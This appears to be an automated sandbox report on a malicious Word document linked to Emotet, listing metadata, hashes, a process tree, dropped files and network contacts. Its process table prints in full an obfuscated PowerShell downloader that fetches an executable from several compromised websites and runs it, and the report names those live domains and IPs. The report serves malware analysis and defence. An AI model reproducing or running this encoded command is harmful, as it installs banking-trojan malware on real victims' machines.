File name: | scan-M-094006471.doc |
Full analysis: | https://app.any.run/tasks/383c00e4-6f60-4f0d-823a-c8d06b063b72 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:32:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: PCI, Subject: Incredible, Author: Waldo Klein, Comments: 24/365 Taka Customer, Template: Normal.dotm, Last Saved By: Lauretta Heidenreich, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 07:25:00 2019, Last Saved Time/Date: Tue Oct 8 07:25:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0 |
MD5: | 0D6182157DDF648D50A3FC03C0797555 |
SHA1: | AB4C5756DCCCFD38000FCD2E15F3AB0DA36A957C |
SHA256: | 5B830F40FA91C4A5D758B1E4AC3AC1F53E52030E6F87CB41B240855BF8D1A0DE |
SSDEEP: | 6144:2OsfUydILkI07NSU4jJnLATfDVbq9XSwcyv01f9L:2OsfUy8X07NSU4VkPVbq9XoR1f9L |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Kling |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 193 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Larkin Group |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 166 |
Words: | 28 |
Pages: | 1 |
ModifyDate: | 2019:10:08 06:25:00 |
CreateDate: | 2019:10:08 06:25:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Lauretta Heidenreich |
Template: | Normal.dotm |
Comments: | 24/365 Taka Customer |
Keywords: | - |
Author: | Waldo Klein |
Subject: | Incredible |
Title: | PCI |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\scan-M-094006471.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1520 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB3AGgAaQB0AGUAegB6AGgAPQAnAHUAcwBlAHIAZgBhAGMAaQBuAGcAbQBpAHUAJwA7ACQAdwBpAHQAaABkAHIAYQB3AGEAbABxAGoAdwAgAD0AIAAnADkAMQAzACcAOwAkAFYAaQBsAGwAYQBnAGUAagB6AGkAPQAnAHMAYwBoAGUAbQBhAHMAegBzAHAAJwA7ACQAaQBuAHYAbwBpAGMAZQB3AGYAdAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBpAHQAaABkAHIAYQB3AGEAbABxAGoAdwArACcALgBlAHgAZQAnADsAJABVAG4AYgByAGEAbgBkAGUAZABfAFcAbwBvAGQAZQBuAF8AQgBhAGwAbAByAGgAdAA9ACcAQwByAGUAZABpAHQAXwBDAGEAcgBkAF8AQQBjAGMAbwB1AG4AdABtAG8AbwAnADsAJABBAHUAdABvAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAaQBsAGkAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAYwBsAEkARQBuAHQAOwAkAGIAeQBwAGEAcwBzAGkAbgBnAGEAYQByAD0AJwBoAHQAdABwAHMAOgAvAC8AbgBvAHIAYgBlAHIAdAB3AGEAcwB6AGEAawAuAHAAbAAvAHQAbQBwAC8ANABhAHQAYwAtADgAaABwADIAbQA0ADgAbgB5AGUALQA0ADcALwBAAGgAdAB0AHAAcwA6AC8ALwBuAGcAdQBvAGkAYgBlAG8ALgBpAG4AZgBvAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgByADYAegB1AGgAdwA4AC0AYwA3AHgAMwBlAGQAYwBoAHYAdwAtADkAMwA5ADMANwA1ADEAMgA1AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AZgBhAHIAbQBlAHIAcwBtAGEAcgBrAGUAdAAuAHEAYQAvAGUAcwBoAG8AcAAvADIAMgBxADgALQA0AGMAcQB6ADcAaQB0AHMAagAtADMAMQAzAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAHkAcABhAHIAYQBjAG8AcgBkAC4AYQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AaABvAHEAcgBuADYAMQAtAGkAdgBpAHgALQA4ADYAOAA4ADQANQA5AC8AQABoAHQAdABwADoALwAvAGkAbQBtAGkAYQBnAGUAbgB0AHMALgBjAG8ALgB1AGsALwB3AHAALQBhAGQAbQBpAG4ALwBmAGkAYgA4AGgANwB2AHAAcQBtAC0AMwBwAHYAMgBuAGMALQAyADIAOAA5ADUANwAzADQALwAnAC4AIgBzAFAATABgAEkAVAAiACgAJwBAACcAKQA7ACQAZABvAHQAYwBvAG0AbQBtAG8APQAnAGIAbAB1AGUAdABqAHIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEwAYQBuAGQAaQBuAGcAagBuAGgAIABpAG4AIAAkAGIAeQBwAGEAcwBzAGkAbgBnAGEAYQByACkAewB0AHIAeQB7ACQAQQB1AHQAbwBfAEwAbwBhAG4AXwBBAGMAYwBvAHUAbgB0AGkAbABpAC4AIgBEAE8AdwBgAE4ATABvAEEAYABkAEYASQBgAGwARQAiACgAJABMAGEAbgBkAGkAbgBnAGoAbgBoACwAIAAkAGkAbgB2AG8AaQBjAGUAdwBmAHQAKQA7ACQASQBuAHQAZQBsAGwAaQBnAGUAbgB0AF8AQwBvAHQAdABvAG4AXwBCAGEAbABsAHMAagBpAD0AJwBnAHIAaQBkAGUAbgBhAGIAbABlAGQAZgBvAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABpAG4AdgBvAGkAYwBlAHcAZgB0ACkALgAiAEwAZQBgAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADUAMgA2ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQBSAHQAIgAoACQAaQBuAHYAbwBpAGMAZQB3AGYAdAApADsAJABBAHIAYwBoAGkAdABlAGMAdABqAHYAawA9ACcAUgBvAGEAZABuAHAAagAnADsAYgByAGUAYQBrADsAJABIAGEAbgBkAGMAcgBhAGYAdABlAGQAXwBQAGwAYQBzAHQAaQBjAF8AUABhAG4AdABzAGoAegBuAD0AJwBtAGEAcgBvAG8AbgBsAHAAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAHIAbwBkAHUAYwB0AGEAbQB2AD0AJwBwAGwAdQBtAHoAZABkACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4E2D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UKV0Q7K71UH68T95CABA.temp | — | |
MD5:— | SHA256:— | |||
1520 | powershell.exe | C:\Users\admin\913.exe | — | |
MD5:— | SHA256:— | |||
3048 | WINWORD.EXE | C:\Users\admin\Desktop\~$an-M-094006471.doc | pgc | |
MD5:C685A78A099551339DB0832DA9482294 | SHA256:A6B39DAFB5123E8B6892528FA053FD6D4AAF3E157C8645CFA3B153D38B26A752 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C048DE.wmf | wmf | |
MD5:C8F2ADA15E2D61AAACF02F1F170CA453 | SHA256:77EAB27D30FA035FF2DE779CF4806A10835C16E48DEE68DDD44BB0152A88DF3A | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:45CE4D891656A6268790ED31D4B57FE4 | SHA256:1D203122C4CD46CA8668709DF59E576C1AFC7780F10A067411866EB5B47CD359 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\scan-M-094006471.doc.LNK | lnk | |
MD5:FF157D8BDE561D1D2E7CA6B82899C3BC | SHA256:E8C32A2542736210B87A9F0A43F3792888EFE43EB10A66DF625F1BBBD0C8944B | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\487A0D72.wmf | wmf | |
MD5:4A7094FCE6F417A9E5482C9A1A301A3F | SHA256:2494E8AB5E1E614C91DB77E3C1F838AA8DF1FC359BB411B05DBAF9F6E442CA78 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93DDB1A8.wmf | wmf | |
MD5:C9CF6B0B3C8766ADA647939D5F478FCA | SHA256:EBCC4BD99978C9300E27A11AAAF914CD16C7D45BB5EE52B7D2411401D06CDCA0 | |||
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22CB1D83.wmf | wmf | |
MD5:61C63AF0E226B2A5E3B53ED9FA809DB2 | SHA256:B8FD375593737DC8C85AF8144A69EE600B21572B9AB26770D4E88F3C6D1BAB14 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1520 | powershell.exe | 46.242.245.94:443 | norbertwaszak.pl | home.pl S.A. | PL | unknown |
1520 | powershell.exe | 104.31.87.181:443 | nguoibeo.info | Cloudflare Inc | US | shared |
1520 | powershell.exe | 162.144.125.199:80 | www.farmersmarket.qa | Unified Layer | US | unknown |
Domain | IP | Reputation |
---|---|---|
norbertwaszak.pl |
| unknown |
nguoibeo.info |
| unknown |
www.farmersmarket.qa |
| unknown |